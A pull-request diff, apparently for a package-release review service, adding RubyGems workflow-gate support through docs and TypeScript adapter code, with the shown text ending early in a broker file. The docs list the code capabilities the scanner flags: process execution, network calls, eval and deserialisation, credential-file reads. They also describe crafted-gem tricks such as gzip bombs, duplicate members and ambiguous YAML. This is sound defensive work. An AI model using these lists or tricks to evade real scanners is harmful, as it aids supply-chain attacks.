### PR TITLE
Add RubyGems workflow-gate ecosystem support

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -4,11 +4,11 @@
 
 - `server/` — Hono Worker. `index.ts` mounts routes under `/api/*`. The Worker is the deploy target (`main` in `wrangler.jsonc`).
   - `routes/scans.ts` — `POST /api/v1/scans { stageId }`, `GET /api/v1/scans`, `GET /api/v1/scans/:id`.
-  - `routes/github-webhooks.ts` — public signed GitHub App webhook endpoint. Persists `deployment_protection_rule` deliveries into `github_workflow_gates`; see `docs/workflow-gates.md`, `docs/npm-workflow-gate.md`, and `docs/pypi-workflow-gate.md`.
+  - `routes/github-webhooks.ts` — public signed GitHub App webhook endpoint. Persists `deployment_protection_rule` deliveries into `github_workflow_gates`; see `docs/workflow-gates.md`, `docs/npm-workflow-gate.md`, `docs/pypi-workflow-gate.md`, and `docs/rubygems-workflow-gate.md`.
   - `lib/sandbox.ts` — Dynamic Worker that downloads/parses package artifacts. `NpmStageGateway` is the only npm-token egress.
   - `lib/review.ts` — deterministic findings, package/package.json diffing, risk computation, and shared UI types.
   - `lib/ai-review.ts` — Workers AI reviewer, wired via `scan-pipeline.ts` and default-off behind the `ai-review` Flagship flag.
-  - `lib/adapters/` — ecosystem-specific registry/artifact behavior for npm, PyPI, and workflow gates.
+  - `lib/adapters/` — ecosystem-specific registry/artifact behavior for npm, PyPI, RubyGems, and workflow gates.
   - `db/` — Drizzle schema and persistence helpers for scans, findings, artifacts, workflow gates, and Better Auth.
 - `src/` — Preact UI. `index.tsx` mounts `preact-iso`; `models/` re-use `server/` types.
 - `drizzle/` — D1 migrations generated from `server/db/schema.ts`.

--- a/docs/rubygems-workflow-gate.md
+++ b/docs/rubygems-workflow-gate.md
@@ -62,7 +62,10 @@ and file/byte caps), and gunzips `metadata.gz` to surface the raw gemspec YAML a
 `gemMetadata`. Nested decompression is bounded by the same `maxTarBytes` cap, so a
 gzip bomb in either member fails closed. Oversized gemspec metadata also fails
 closed instead of being parsed from a truncated prefix, because the gemspec is the
-source of package identity. The installation token never enters the sandbox; only
+source of package identity. Duplicate `metadata.gz`/`data.tar.gz` members fail
+closed too: real gems carry each control member exactly once, and picking one of
+a crafted pair could review a different payload than RubyGems' own reader
+extracts. The installation token never enters the sandbox; only
 the gem bytes cross the trust boundary, through the credentials-free
 `downloadInSandboxInline` path.
 
@@ -72,7 +75,10 @@ from that gemspec YAML by a small, defensive line reader
 (`server/lib/adapters/rubygems/gemspec.ts`) — not a general YAML library, because
 the gemspec layout is regular and the bytes are attacker-controlled. A malformed
 gemspec degrades every field to null/empty (surfacing as a `metadata-missing`
-finding) rather than throwing.
+finding) rather than throwing. Root-level shapes the reader does not model but
+Psych would honor — quoted or escaped mapping keys, explicit `? key` syntax,
+directives, a second YAML document — invalidate the whole parse the same way, so
+a crafted spec cannot present one identity to Drydock and another to `gem push`.
 
 ## No auto-detection ambiguity
 

--- a/docs/rubygems-workflow-gate.md
+++ b/docs/rubygems-workflow-gate.md
@@ -63,9 +63,10 @@ and file/byte caps), and gunzips `metadata.gz` to surface the raw gemspec YAML a
 gzip bomb in either member fails closed. Oversized gemspec metadata also fails
 closed instead of being parsed from a truncated prefix, because the gemspec is the
 source of package identity. Duplicate `metadata.gz`/`data.tar.gz` members fail
-closed too: real gems carry each control member exactly once, and picking one of
+closed too — real gems carry each control member exactly once, and picking one of
 a crafted pair could review a different payload than RubyGems' own reader
-extracts. The installation token never enters the sandbox; only
+extracts — as do the legacy uncompressed `metadata`/`data.tar` spellings that
+RubyGems' reader would also honour but `gem build` never emits. The installation token never enters the sandbox; only
 the gem bytes cross the trust boundary, through the credentials-free
 `downloadInSandboxInline` path.
 

--- a/docs/rubygems-workflow-gate.md
+++ b/docs/rubygems-workflow-gate.md
@@ -39,7 +39,10 @@ Integrity rests on **GitHub artifact immutability**, exactly like the PyPI gate:
 Drydock synthesizes an internal release manifest
 (`drydock.release-artifacts.v1`, `ecosystem: "rubygems"`) from the parsed
 Gem::Specification identity plus the recomputed digest. Maintainers never author
-it.
+it. The recomputed digests surface as the report **Provenance** section and in
+the `report.json` export (`provenance.artifacts[]`, `kind: "gem"`), so the
+publish job can verify the gem it is about to push against the reviewed bytes;
+see [`workflow-gates.md`](./workflow-gates.md#provenance-surfacing).
 
 ## Parsing a `.gem` (nested archives)
 

--- a/docs/rubygems-workflow-gate.md
+++ b/docs/rubygems-workflow-gate.md
@@ -1,0 +1,229 @@
+# RubyGems workflow-gate mode
+
+This document covers RubyGems review through a **GitHub deployment-protection
+workflow gate**. RubyGems has no npm-style staged registry artifact for external
+review, and RubyGems Trusted Publishing already publishes from GitHub Actions
+with short-lived OIDC credentials — so the workflow-gate architecture (build the
+release artifact, hold the publish job on a GitHub Environment, review the exact
+artifact, then release or block the job) maps cleanly onto gem releases.
+
+It only describes what is RubyGems-specific. The webhook ingestion, gate
+persistence, artifact download + SHA-256 recomputation, approve/reject callback,
+2FA step-up, monorepo fan-out, notifications, and timeout handling are all
+**shared with the PyPI and npm gates** and documented in
+[`workflow-gates.md`](./workflow-gates.md). Read that first for the end-to-end
+gate lifecycle.
+
+Official references:
+
+- RubyGems Trusted Publishing: `https://guides.rubygems.org/trusted-publishing/`
+- RubyGems publishing guide: `https://guides.rubygems.org/publishing/`
+- RubyGems versions API: `https://guides.rubygems.org/rubygems-org-api/`
+
+## The release candidate
+
+There is **no manifest file and no checksum file** to write. The boundary is the
+workflow run's uploaded artifacts: CI runs `gem build` (one `.gem` per
+publishable gem, plus one per native platform) and uploads `pkg/*.gem` as a
+GitHub Actions artifact. Drydock treats every `.gem` it finds as the release set.
+
+Integrity rests on **GitHub artifact immutability**, exactly like the PyPI gate:
+
+- Drydock downloads the artifact bytes in the control plane and recomputes each
+  gem's SHA-256 (`fetchReleaseBundleWithToken`). That digest is the reviewed
+  gem's digest, bound to the immutable GitHub Actions artifact.
+- The publish job downloads the **same immutable artifact** and runs
+  `gem push <file>.gem` — it never rebuilds. The bytes Drydock reviewed are the
+  bytes that get published.
+
+Drydock synthesizes an internal release manifest
+(`drydock.release-artifacts.v1`, `ecosystem: "rubygems"`) from the parsed
+Gem::Specification identity plus the recomputed digest. Maintainers never author
+it.
+
+## Parsing a `.gem` (nested archives)
+
+A `.gem` is **not** a plain gzipped tarball like an npm `.tgz` or a PyPI sdist.
+It is an _uncompressed_ tar whose members are themselves archives:
+
+```
+example-1.0.0.gem            (uncompressed tar)
+├── metadata.gz              (gzipped Gem::Specification YAML)
+├── data.tar.gz              (gzipped tar of the installed files: lib/, ext/, bin/, …)
+└── checksums.yaml.gz        (gzipped SHA digests of the two members above)
+```
+
+The shared sandbox grows a dedicated `gem` archive format
+(`server/lib/tar-parser.js` `readGem`, wired through `server/lib/sandbox.ts`):
+it reads the outer tar, gunzips `data.tar.gz` and re-parses it with the **same
+hardened `readTar`** every ecosystem uses (so the installed files flow through
+the identical untrusted-archive parser, path-traversal/suspicious-entry checks,
+and file/byte caps), and gunzips `metadata.gz` to surface the raw gemspec YAML as
+`gemMetadata`. Nested decompression is bounded by the same `maxTarBytes` cap, so a
+gzip bomb in either member fails closed. Oversized gemspec metadata also fails
+closed instead of being parsed from a truncated prefix, because the gemspec is the
+source of package identity. The installation token never enters the sandbox; only
+the gem bytes cross the trust boundary, through the credentials-free
+`downloadInSandboxInline` path.
+
+Identity (`package` / `version` / `platform`) and the install-time capability
+fields (`executables`, `extensions`, `metadata.allowed_push_host`, …) are parsed
+from that gemspec YAML by a small, defensive line reader
+(`server/lib/adapters/rubygems/gemspec.ts`) — not a general YAML library, because
+the gemspec layout is regular and the bytes are attacker-controlled. A malformed
+gemspec degrades every field to null/empty (surfacing as a `metadata-missing`
+finding) rather than throwing.
+
+## No auto-detection ambiguity
+
+A `.gem` extension is unique to RubyGems, so unlike an npm `.tgz` (byte- and
+name-indistinguishable from a PyPI sdist), a gem is classified purely by path and
+never needs content-based ecosystem detection. A release target can be left on
+**auto-detect** (no pinned ecosystem) and a `.gem` still routes to the rubygems
+adapter; pinning `ecosystem: "rubygems"` is supported but optional. A bundle that
+mixes `.gem`, `.tgz`, and `.whl` files fans out per ecosystem as usual.
+
+## Monorepo and native gems
+
+One gem version can ship several `.gem` files — a pure-ruby gem plus
+platform-specific native builds (`example-1.0.0.gem`,
+`example-1.0.0-x86_64-linux.gem`, `example-1.0.0-java.gem`). They are grouped by
+gem name into one review per gem:
+
+- gems that share a name must agree on the version (a version-skewed file fails
+  the gate closed with `artifact_identity_inconsistent`);
+- two gems claiming the same name **and** platform are rejected — a single
+  name/version/platform is exactly one `.gem`;
+- distinct platforms of the same gem are the expected native-gem shape and are
+  reviewed together, each namespaced by platform in the diff;
+- a `.gem` with no parseable Gem::Specification name/version fails closed
+  (`artifact_identity_missing`).
+
+A true monorepo that publishes several distinct gems fans out into one scan per
+gem, each against its own baseline; the held deployment releases only once every
+gem is individually approved.
+
+## Deterministic findings
+
+On top of the shared file-level rules (secrets, and the **Ruby** code-capability
+set — `system`/`exec`/`%x`/`Open3`, `Net::HTTP`/`open-uri`/sockets,
+`eval`/`Marshal.load`/`YAML.load`, `ENV`/credential-file reads — run with diff
+annotations), the rubygems adapter adds gem-specific rules
+(`server/lib/adapters/rubygems/findings.ts`):
+
+- `rubygems.metadata-mismatch` (critical) — the gemspec name/version disagrees
+  with the reviewed manifest.
+- `rubygems.metadata-missing` (medium) — the gem exposes no usable
+  name/version, so it cannot be proven to match the manifest.
+- `rubygems.native-extension` (medium) — the gemspec declares `extensions`, so
+  `gem install` will compile native code, running the build script on the
+  consumer machine.
+- `rubygems.extension-build-hook` (high) — a native-extension build file under
+  `ext/` (`extconf.rb`, `mkrf_conf.rb`, `Rakefile`, `Makefile`) contains
+  process/network/dynamic-eval code, the RubyGems analogue of a PyPI
+  `setup.py` install command.
+- `rubygems.unexpected-push-host` (low) — the gemspec restricts pushes to a host
+  other than rubygems.org (`metadata.allowed_push_host`), a provenance signal.
+
+New executables and other unexpected packaged-file changes surface through the
+standard package diff over the gem's files; the persisted report carries each
+gem's dependency list, executables, extensions, and metadata for review.
+
+## Baseline (currently-published version)
+
+The baseline is the currently-published gem, selected and fetched through a
+credential-free broker (`server/lib/adapters/rubygems/broker.ts`):
+
+- `GET https://rubygems.org/api/v1/versions/<gem>.json` lists published versions;
+  `pickRubyGemsBaselineVersion` picks the newest stable version that is not the
+  candidate (falling back to the newest pre-release).
+- only the platforms actually staged are downloaded
+  (`https://rubygems.org/downloads/<gem>-<version>[-<platform>].gem`), bounded
+  to one gem per platform, with the URL pinned on the sandbox public-artifact
+  allowlist so the request is uncredentialed and host-restricted to
+  rubygems.org.
+
+Baseline resolution is best-effort: a missing or unreachable baseline degrades to
+a full-tree review (every file reads as added) rather than failing the gate.
+
+## Code sharing
+
+The rubygems review runs on the same `PackageAdapter` pipeline as npm and PyPI:
+
+- `server/lib/adapters/rubygems/index.ts` — `rubygemsAdapter`, the
+  `PackageAdapter` the shared pipeline runs (parse input, staged + baseline
+  acquisition, deterministic findings, risk).
+- `server/lib/adapters/rubygems/manifest.ts` — the synthesized release-manifest
+  type + validator.
+- `server/lib/workflow-gates/rubygems.ts` — `rubygemsWorkflowGateAdapter`, the
+  `WorkflowGateAdapter`: `classifyArtifact` (`.gem`), `detectArtifact` (always
+  null — `.gem` is path-unique), and `prepareReleaseCandidates` (group parsed
+  gems by name → one candidate per gem).
+
+## Workflow shape
+
+```yaml
+jobs:
+  build-release-artifacts:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - uses: ruby/setup-ruby@v1
+        with: { ruby-version: "3.3" }
+      # `gem build` (or `rake build`) emits the .gem files; for native gems,
+      # build each platform variant into pkg/.
+      - run: gem build *.gemspec --output "pkg/$(ruby -e 'print "#{Gem::Specification.load(Dir["*.gemspec"].first).full_name}.gem"')"
+      - uses: actions/upload-artifact@v4
+        with:
+          name: rubygems-release-candidate # or leave blank in the release target to auto-detect
+          path: pkg/*.gem
+          if-no-files-found: error
+
+  publish:
+    needs: build-release-artifacts
+    runs-on: ubuntu-latest
+    environment: rubygems # the gate: Drydock's deployment protection rule lives here
+    permissions:
+      id-token: write # OIDC for RubyGems Trusted Publishing
+      contents: read
+    steps:
+      - uses: ruby/setup-ruby@v1
+        with: { ruby-version: "3.3" }
+      # No checkout, no rebuild: GitHub artifact storage is immutable, so the
+      # bytes the gate approved are the bytes we download and push here.
+      - uses: actions/download-artifact@v4
+        with: { name: rubygems-release-candidate, path: pkg }
+      - uses: rubygems/configure-rubygems-credentials@main
+      - run: |
+          shopt -s nullglob
+          for gem in pkg/*.gem; do
+            gem push "$gem"
+          done
+```
+
+The `environment: rubygems` line is the gate. Map the repository + environment on
+`Organization settings → GitHub App`, configure a matching RubyGems Trusted
+Publisher on the same environment, and attach Drydock as a custom deployment
+protection rule on it. The publish job stays blocked until a maintainer approves
+every gem's review in Drydock; publishing then proceeds over Trusted
+Publishing/OIDC — Drydock never holds or sees a RubyGems API key.
+
+## Acceptance mapping (issue #200)
+
+- _Org settings can map a GitHub repo + environment to a RubyGems gem_ — the
+  shared release-target mapping accepts `ecosystem: "rubygems"`.
+- _A pending deployment-protection request creates a `workflow_gate` scan with
+  `ecosystem = rubygems`_ — shared gate machinery; the `.gem` bundle resolves to
+  `rubygemsAdapter` scans linked to the gate.
+- _Drydock downloads and scans `.gem` candidates from the workflow artifact
+  bundle_ — `fetchReleaseBundleWithToken` + the sandbox `gem` parse path.
+- _The scan compares the candidate against the previous published gem version_ —
+  `acquireBaselineRubyGems` via the rubygems.org versions API.
+- _Approve/reject releases or blocks the held job_ — shared decision callback.
+- _Tests cover gem metadata parsing, nested archive limits, baseline selection,
+  native extension findings, and gate decision behavior_ — `test/rubygems-*.mjs`,
+  `test/rubygems.test.mjs`, `test/security-corpus-rubygems.test.mjs`, and
+  `test/workers/workflow-gate-rubygems.test.ts` /
+  `workflow-gate-prepare.test.ts`.
+- _The publish credential stays out of Drydock_ — publishing remains in GitHub
+  Actions through RubyGems Trusted Publishing.

--- a/docs/workflow-gates.md
+++ b/docs/workflow-gates.md
@@ -2,9 +2,9 @@
 
 Workflow gates are Drydock's review mode for releases whose registry cannot hold a private staged artifact. GitHub Actions builds the release, uploads the candidate artifacts, and a GitHub Environment custom deployment-protection rule pauses publishing while Drydock reviews the bytes.
 
-Supported gate ecosystems: **PyPI** and **npm**. Shared GitHub plumbing lives in `server/lib/workflow-gates/`; artifact-specific behavior lives behind adapters.
+Supported gate ecosystems: **PyPI**, **npm**, and **RubyGems**. Shared GitHub plumbing lives in `server/lib/workflow-gates/`; artifact-specific behavior lives behind adapters. npm workflow-gate specifics are documented in [`npm-workflow-gate.md`](./npm-workflow-gate.md), and RubyGems specifics are documented in [`rubygems-workflow-gate.md`](./rubygems-workflow-gate.md).
 
-## Core contract
+## Core Contract
 
 1. A repository installs the Drydock GitHub App and configures a GitHub Environment with Drydock as a deployment-protection rule.
 2. The publish workflow builds release artifacts and uploads them before the protected publish job starts.
@@ -17,7 +17,7 @@ Supported gate ecosystems: **PyPI** and **npm**. Shared GitHub plumbing lives in
 
 The GitHub webhook is public but signed with `GITHUB_WEBHOOK_SECRET` and bypasses Better Auth only after signature verification. All stored gate state remains organization-scoped.
 
-## Shared implementation
+## Shared Implementation
 
 - `server/routes/github-webhooks.ts` verifies GitHub webhook signatures and persists gate deliveries.
 - `server/routes/github-app.ts` handles App install/callback setup.
@@ -28,7 +28,7 @@ The GitHub webhook is public but signed with `GITHUB_WEBHOOK_SECRET` and bypasse
 
 Required bindings/secrets include the GitHub App id/private key/client credentials, webhook secret, installation access, queues, D1, R2, and normal scan pipeline bindings. See [`self-hosting.md`](./self-hosting.md) for setup.
 
-## Release set derivation
+## Release Set Derivation
 
 A release set is the boundary between CI and Drydock. Drydock never trusts a maintainer-declared manifest as authority over reviewed bytes; it recomputes identity and digest evidence from the uploaded artifacts themselves.
 
@@ -53,7 +53,7 @@ Those digests match the ones Drydock recomputes and surfaces in the report
 Provenance section and `report.json` (`provenance.artifacts[]`), so the build,
 review, and publish all hash the same bytes.
 
-## PyPI workflow-gate notes
+## PyPI Workflow-Gate Notes
 
 PyPI has no `drydock-manifest.json`. The release set is whatever wheels and sdists the workflow uploads, with identity parsed from wheel `METADATA` or sdist `PKG-INFO`.
 
@@ -68,7 +68,7 @@ The PyPI adapter (`server/lib/adapters/pypi/`):
 - downloads matching baseline wheels/sdists through a credential-free broker restricted to `https://files.pythonhosted.org`;
 - reports metadata mismatches, missing wheel `RECORD`, `.pth` startup hooks, custom `setup.py` install commands, and `.pyd` native extensions.
 
-## npm workflow-gate notes
+## npm Workflow-Gate Notes
 
 Use npm workflow gates when CI publishes from built artifacts instead of `npm publish --stage`, or when the release must be paused by GitHub rather than npm registry staging.
 
@@ -106,7 +106,23 @@ See [`pypi-workflow-gate.md`](./pypi-workflow-gate.md) for the PyPI-specific
 workflow shape, including build-time `SHA256SUMS` generation and publish-time
 verification.
 
-## Trust and failure behavior
+## RubyGems Workflow-Gate Notes
+
+RubyGems has no registry-side staging step for external review. The candidate is the uploaded `.gem` artifact, and the protected publish job must download and push that exact reviewed file through RubyGems Trusted Publishing. Do not rebuild after approval.
+
+The RubyGems adapter (`server/lib/adapters/rubygems/`):
+
+- classifies `.gem` files by path; unlike npm `.tgz` versus PyPI sdists, `.gem` is not content-ambiguous;
+- parses RubyGems' uncompressed outer tar, then bounded `metadata.gz` and `data.tar.gz` members;
+- derives gem name, version, platform, executables, extensions, dependencies, requirements, and metadata from the Gem::Specification YAML;
+- groups native platform variants by normalized gem name and requires each group to share one version;
+- rejects missing identity, version skew, and duplicate name/platform artifacts fail-closed;
+- selects the current published baseline from the RubyGems versions API and downloads matching staged platforms from `https://rubygems.org/downloads/`;
+- reports metadata mismatches, missing metadata, native extension build hooks, and unexpected `metadata.allowed_push_host` values.
+
+See [`rubygems-workflow-gate.md`](./rubygems-workflow-gate.md) for the complete RubyGems workflow and parser trust boundary.
+
+## Trust and Failure Behavior
 
 - The GitHub webhook signature is mandatory.
 - Gate decisions must resolve to the original installation, repository, workflow run, environment, and callback URL.
@@ -115,11 +131,11 @@ verification.
 - If artifact resolution, baseline acquisition, validation, scan, or callback fails, the gate remains blocked or is rejected; do not fail open.
 - Drydock never publishes. It only posts the GitHub deployment-protection decision.
 
-## Maintainer workbench
+## Maintainer Workbench
 
 The gate review workbench shows the release target, package identity/version, artifact set, scan status, findings, changed files, and accept/reject controls. Accept/reject actions require an authenticated maintainer in the owning organization. Step-up auth requirements should match other sensitive release decisions; see [`two-factor-auth.md`](./two-factor-auth.md).
 
-## Adding a new ecosystem
+## Adding A New Ecosystem
 
 1. Add or extend a package adapter under `server/lib/adapters/<ecosystem>/`.
 2. Implement release-set derivation from uploaded artifact bytes.
@@ -129,7 +145,7 @@ The gate review workbench shows the release target, package identity/version, ar
 6. Add Worker-route tests for webhook/gate lifecycle and adapter tests for archive/metadata/baseline behavior.
 7. Add fake-registry or fake-artifact e2e coverage when the publish workflow or browser-visible review flow changes.
 
-## Provenance surfacing
+## Provenance Surfacing
 
 Each gate adapter's `summarizeDetails` emits a `provenance` block — `{ ecosystem,
 mode, artifacts: [{ path, kind, sha256 }] }` — built from the digests the control
@@ -140,7 +156,7 @@ scan workbench, and re-validated into the `report.json` export as a top-level
 checksum file it built and the bytes it is about to publish, closing the
 byte-continuity loop without trusting any single step.
 
-## Remaining work
+## Remaining Work
 
 - Expand gate-specific e2e coverage as more ecosystems are added.
-- Keep GitHub/PyPI/npm validation failures user-actionable without leaking credentials or private package bytes.
+- Keep GitHub/PyPI/npm/RubyGems validation failures user-actionable without leaking credentials or private package bytes.

--- a/server/lib/adapters/rubygems/acquire.ts
+++ b/server/lib/adapters/rubygems/acquire.ts
@@ -1,0 +1,310 @@
+import type { FileRecord, PackageJsonSummary } from "../../review";
+import type { TarSuspiciousEntry } from "../../tar-parser.js";
+import type { AcquiredArtifact, AdapterContext, BaselineInfo, StagedDetails } from "../types";
+import type { RubyGemsBroker } from "./broker";
+import { emptyGemspecSummary, parseGemspecMetadata } from "./gemspec";
+import { namespacedPath } from "./findings";
+import {
+  type GemArtifactSummary,
+  type RubyGemsAdapterDetails,
+  type RubyGemsAdapterInput,
+  type RubyGemsArtifactInput,
+  type RubyGemsBaselineSelection,
+  type RubyGemsBaselineSelectionSource,
+  type RubyGemsPreparedArtifact,
+  type RubyGemsReleaseManifest,
+  type RubyGemsRemoteArtifact,
+  type RubyGemsVersion,
+} from "./types";
+
+const RUBYGEMS_DOWNLOAD_BASE = "https://rubygems.org/downloads";
+
+export function prepareRubyGemsArtifact(input: RubyGemsArtifactInput): RubyGemsPreparedArtifact {
+  const spec = input.gemMetadata ? parseGemspecMetadata(input.gemMetadata) : emptyGemspecSummary();
+  const platform = spec.platform || "ruby";
+  const summary: GemArtifactSummary = {
+    path: input.path,
+    platform,
+    name: spec.name,
+    version: spec.version,
+    bindir: spec.bindir,
+    executables: spec.executables,
+    extensions: spec.extensions,
+    requirePaths: spec.requirePaths,
+    licenses: spec.licenses,
+    requirements: spec.requirements,
+    requiredRubyVersion: spec.requiredRubyVersion,
+    dependencies: spec.dependencies,
+    metadata: spec.metadata,
+    hasGemspec: Boolean(input.gemMetadata),
+  };
+  return { ...input, platform, summary };
+}
+
+export function acquireStagedRubyGems(input: RubyGemsAdapterInput): {
+  artifact: AcquiredArtifact;
+  details: StagedDetails;
+} {
+  assertManifestArtifactSet(input.manifest, input.artifacts);
+  const preparedArtifacts = input.artifacts.map(prepareRubyGemsArtifact);
+  const files = flattenRubyGemsArtifactFiles(preparedArtifacts);
+  const suspiciousTarEntries = flattenRubyGemsSuspiciousEntries(preparedArtifacts);
+  const manifest = packageJsonSummaryFor(input.manifest, preparedArtifacts);
+  return {
+    artifact: {
+      files,
+      manifest,
+      ...(suspiciousTarEntries.length ? { suspiciousTarEntries } : {}),
+    },
+    details: {
+      manifest: input.manifest,
+      artifacts: preparedArtifacts.map((artifact) => artifact.summary),
+      preparedArtifacts,
+    } satisfies RubyGemsAdapterDetails,
+  };
+}
+
+export async function acquireBaselineRubyGems(
+  ctx: AdapterContext,
+  input: RubyGemsAdapterInput,
+  broker: RubyGemsBroker,
+  staged: { artifact: AcquiredArtifact; details: StagedDetails },
+): Promise<{ artifact: AcquiredArtifact | null; baseline: BaselineInfo }> {
+  if (input.previousArtifacts?.length) {
+    return baselineFromPreviousArtifacts(input);
+  }
+
+  const versions = input.versions ?? (await broker.fetchGemVersions(input.manifest.package));
+  if (!versions?.length) return emptyRubyGemsBaseline("metadata-unavailable");
+
+  const selection = pickRubyGemsBaselineVersion(versions, input.manifest.version);
+  if (!selection.version) {
+    return emptyRubyGemsBaseline(selection.reason, { source: selection.source });
+  }
+
+  const stagedPlatforms = stagedArtifactPlatforms(staged.details);
+  const comparable = selectRubyGemsBaselineArtifacts(
+    versions,
+    selection.version,
+    input.manifest.package,
+    stagedPlatforms,
+  );
+  if (!comparable.length) {
+    return emptyRubyGemsBaseline(`${selection.reason}:no-comparable-artifacts`, {
+      version: selection.version,
+      source: selection.source,
+    });
+  }
+
+  // Baseline is a best-effort diff aid, not a security control: a rubygems.org
+  // outage, a removed gem, or a download/parse error degrades to a full-tree
+  // review (every file reads as added — the more conservative outcome) instead
+  // of failing the gate, mirroring the npm gate adapter's baseline handling.
+  let downloaded: RubyGemsArtifactInput[];
+  try {
+    downloaded = await Promise.all(
+      comparable.map(async (artifact) => {
+        const result = await broker.downloadPublicGem(artifact.url);
+        return {
+          path: artifact.filename,
+          files: result.files,
+          gemMetadata: result.gemMetadata ?? null,
+        };
+      }),
+    );
+  } catch {
+    return emptyRubyGemsBaseline(`${selection.reason}:download-failed`, {
+      version: selection.version,
+      source: selection.source,
+    });
+  }
+
+  const preparedArtifacts = downloaded.map(prepareRubyGemsArtifact);
+  return {
+    artifact: {
+      files: flattenRubyGemsArtifactFiles(preparedArtifacts),
+      manifest: packageJsonSummaryFor(input.manifest, preparedArtifacts),
+    },
+    baseline: {
+      version: selection.version,
+      tag: null,
+      source: selection.source,
+      distTagVersion: null,
+      reason: selection.reason,
+    },
+  };
+}
+
+export function baselineFromPreviousArtifacts(input: RubyGemsAdapterInput): {
+  artifact: AcquiredArtifact | null;
+  baseline: BaselineInfo;
+} {
+  if (!input.previousArtifacts?.length) return emptyRubyGemsBaseline("no-previous-artifacts");
+  const preparedArtifacts = input.previousArtifacts.map(prepareRubyGemsArtifact);
+  const manifest = packageJsonSummaryFor(input.manifest, preparedArtifacts);
+  return {
+    artifact: {
+      files: flattenRubyGemsArtifactFiles(preparedArtifacts),
+      manifest,
+    },
+    baseline: {
+      version: manifest.version ?? null,
+      tag: null,
+      source: "latest-published",
+      distTagVersion: null,
+      reason: "provided-previous-artifacts",
+    },
+  };
+}
+
+function emptyRubyGemsBaseline(
+  reason: string,
+  opts: { version?: string | null; source?: RubyGemsBaselineSelectionSource } = {},
+): { artifact: null; baseline: BaselineInfo } {
+  return {
+    artifact: null,
+    baseline: {
+      version: opts.version ?? null,
+      tag: null,
+      source: opts.source ?? "none",
+      distTagVersion: null,
+      reason,
+    },
+  };
+}
+
+function stagedArtifactPlatforms(details: StagedDetails): Set<string> {
+  const d = details as RubyGemsAdapterDetails;
+  return new Set(d.preparedArtifacts.map((artifact) => artifact.platform));
+}
+
+// Baseline selection runs before any bytes are fetched, so we bound downloads to
+// the platforms actually staged (one gem per staged platform); a project with
+// many native-platform gems then triggers at most a handful of downloads.
+function selectRubyGemsBaselineArtifacts(
+  versions: RubyGemsVersion[],
+  version: string,
+  name: string,
+  stagedPlatforms: Set<string>,
+): RubyGemsRemoteArtifact[] {
+  const seen = new Set<string>();
+  const selected: RubyGemsRemoteArtifact[] = [];
+  for (const entry of versions) {
+    if (entry.number !== version) continue;
+    const platform = entry.platform || "ruby";
+    if (!stagedPlatforms.has(platform) || seen.has(platform)) continue;
+    seen.add(platform);
+    const suffix = platform === "ruby" ? "" : `-${platform}`;
+    selected.push({
+      filename: `${name}-${version}${suffix}.gem`,
+      url: `${RUBYGEMS_DOWNLOAD_BASE}/${name}-${version}${suffix}.gem`,
+      platform,
+      version,
+    });
+  }
+  return selected;
+}
+
+export function pickRubyGemsBaselineVersion(
+  versions: RubyGemsVersion[],
+  candidateVersion: string,
+): RubyGemsBaselineSelection {
+  // Newest published release that is neither the candidate nor a pre-release.
+  const stable = versions.filter(
+    (entry) => entry.number && entry.number !== candidateVersion && entry.prerelease !== true,
+  );
+  const newest = newestByBuildTime(stable);
+  if (newest) {
+    return { version: newest, source: "latest-published", reason: "newest-stable-release" };
+  }
+
+  // Fall back to any other published version (including pre-releases) by build time.
+  const others = versions.filter((entry) => entry.number && entry.number !== candidateVersion);
+  const fallback = newestByBuildTime(others);
+  if (fallback) {
+    return { version: fallback, source: "upload-time", reason: "newest-published-release" };
+  }
+
+  return { version: null, source: "none", reason: "no-published-baseline" };
+}
+
+function newestByBuildTime(entries: RubyGemsVersion[]): string | null {
+  let best: { version: string; time: number } | null = null;
+  for (const entry of entries) {
+    if (!entry.number) continue;
+    const time = Date.parse(entry.built_at ?? entry.created_at ?? "");
+    const score = Number.isFinite(time) ? time : 0;
+    // Prefer the latest timestamp; with no timestamps the first-seen wins, which
+    // matches the registry returning newest-first.
+    if (!best || score > best.time) best = { version: entry.number, time: score };
+  }
+  return best?.version ?? null;
+}
+
+function flattenRubyGemsArtifactFiles(artifacts: RubyGemsPreparedArtifact[]): FileRecord[] {
+  return artifacts.flatMap((artifact) =>
+    artifact.files.map((file) => ({
+      ...file,
+      path: namespacedPath(safeDiffPathPart(artifact.platform), file.path),
+    })),
+  );
+}
+
+function flattenRubyGemsSuspiciousEntries(
+  artifacts: RubyGemsPreparedArtifact[],
+): TarSuspiciousEntry[] {
+  return artifacts.flatMap((artifact) =>
+    (artifact.suspiciousEntries ?? []).map((entry) => ({
+      ...entry,
+      path: namespacedPath(safeDiffPathPart(artifact.platform), entry.path),
+    })),
+  );
+}
+
+function assertManifestArtifactSet(
+  manifest: RubyGemsReleaseManifest,
+  artifacts: RubyGemsArtifactInput[],
+): void {
+  const manifestPaths = sortedUnique(manifest.artifacts.map((artifact) => artifact.path));
+  const artifactPaths = sortedUnique(artifacts.map((artifact) => artifact.path));
+  if (
+    manifestPaths.length !== manifest.artifacts.length ||
+    artifactPaths.length !== artifacts.length ||
+    manifestPaths.length !== artifactPaths.length ||
+    manifestPaths.some((path, index) => path !== artifactPaths[index])
+  ) {
+    throw new Error("review artifacts must exactly match manifest artifacts");
+  }
+}
+
+function sortedUnique(values: string[]): string[] {
+  return [...new Set(values)].sort();
+}
+
+function safeDiffPathPart(value: string): string {
+  return value.replace(/[^A-Za-z0-9._-]+/g, "_") || "ruby";
+}
+
+export function pickPackageIdentity(
+  manifest: RubyGemsReleaseManifest,
+  artifacts: RubyGemsPreparedArtifact[],
+): { name: string | null; version: string | null } {
+  const summary = artifacts.find(
+    (artifact) => artifact.summary.name && artifact.summary.version,
+  )?.summary;
+  return {
+    name: summary?.name ?? manifest.package ?? null,
+    version: summary?.version ?? manifest.version ?? null,
+  };
+}
+
+function packageJsonSummaryFor(
+  manifest: RubyGemsReleaseManifest,
+  artifacts: RubyGemsPreparedArtifact[],
+): PackageJsonSummary {
+  const identity = pickPackageIdentity(manifest, artifacts);
+  return {
+    name: identity.name ?? undefined,
+    version: identity.version ?? undefined,
+  };
+}

--- a/server/lib/adapters/rubygems/broker.ts
+++ b/server/lib/adapters/rubygems/broker.ts
@@ -1,0 +1,71 @@
+import type { DownloadResult } from "../../sandbox";
+import type { AdapterBroker, AdapterConnectionRef, AdapterContext } from "../types";
+import type { RubyGemsVersion } from "./types";
+
